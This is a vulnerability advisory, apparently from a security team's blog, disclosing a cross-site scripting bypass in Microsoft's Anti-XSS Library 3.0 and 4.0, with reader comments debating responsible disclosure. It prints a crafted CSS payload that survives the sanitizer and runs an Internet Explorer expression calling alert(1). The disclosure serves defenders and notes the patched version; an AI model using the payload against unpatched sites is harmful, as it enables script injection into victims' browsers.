Introduction:
Microsoft Anti-XSS Library is used to protect applications from Cross-Site Scripting attacks, by providing methods for input sanitization.
Vulnerability:
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker is able to create a specially formed CSS, that after passing through the GetSafeHTML or GetSafeHTMLFragment methods, contains an expression that triggers a JavaScript call in Internet Explorer.
The following ASP.NET code demonstrates the vulnerability:
1. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
2. string data = Microsoft.Security.Application.Sanitizer.GetSafeHtmlFragment("<div style=\"font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'\">aaa</div>");
The string value can be broken down as follows:
div{
font-family:Foo,Bar\,'a\a';
font-family:';color:expression(alert(1));y'
}
A bug in the Anti-XSS library causes the closing apostrophe in the first CSS rule to be dropped. Because of the string not being properly terminated, Internet Explorer now renders this CSS in a different way, which triggers a javascript call:
div{
font-family:Foo,Bar\,'a\a;font-family:';
color:expression(alert(1));
y'
}
Impact:
Every application that relies on either GetSafeHTML or GetSafeHtmlFragment to sanitize user supplied data is vulnerable to XSS.
Remediation:
Microsoft has issued a the Anti-XSS library 4.2 to address this issue.
References:
http://www.securityfocus.com/bid/51291
http://technet.microsoft.com/en-us/security/bulletin/ms12-007
Discovered by - Adi Cohen, IBM Application Security Research
The blog post seems more to be about spreading FUD about Microsoft than actually addressing the issue. You blog about a known security flaw, that has already been patched nearly 2 weeks ago.
http://technet.microsoft.com/en-us/security/bulletin/ms12-007
Microsoft has clearly already published this issue along with the 4.2 version of Anti-XSS that closes this security vulnerability.
Where is your link to the fix?
Posted by: Dotnetchris | January 20, 2012 at 04:20 PM
@Dotnetchris - have you bothered to look in the "Acknowledgments" section of the Microsoft security bulletin? It was *our team* that disclosed this to Microsoft. We then waited for Microsoft to patch this issue, and only then published the full details of the issue. That's called responsible disclosure. There's no FUD here, just technical details.
Posted by: AppSecInsider | February 26, 2012 at 10:02 AM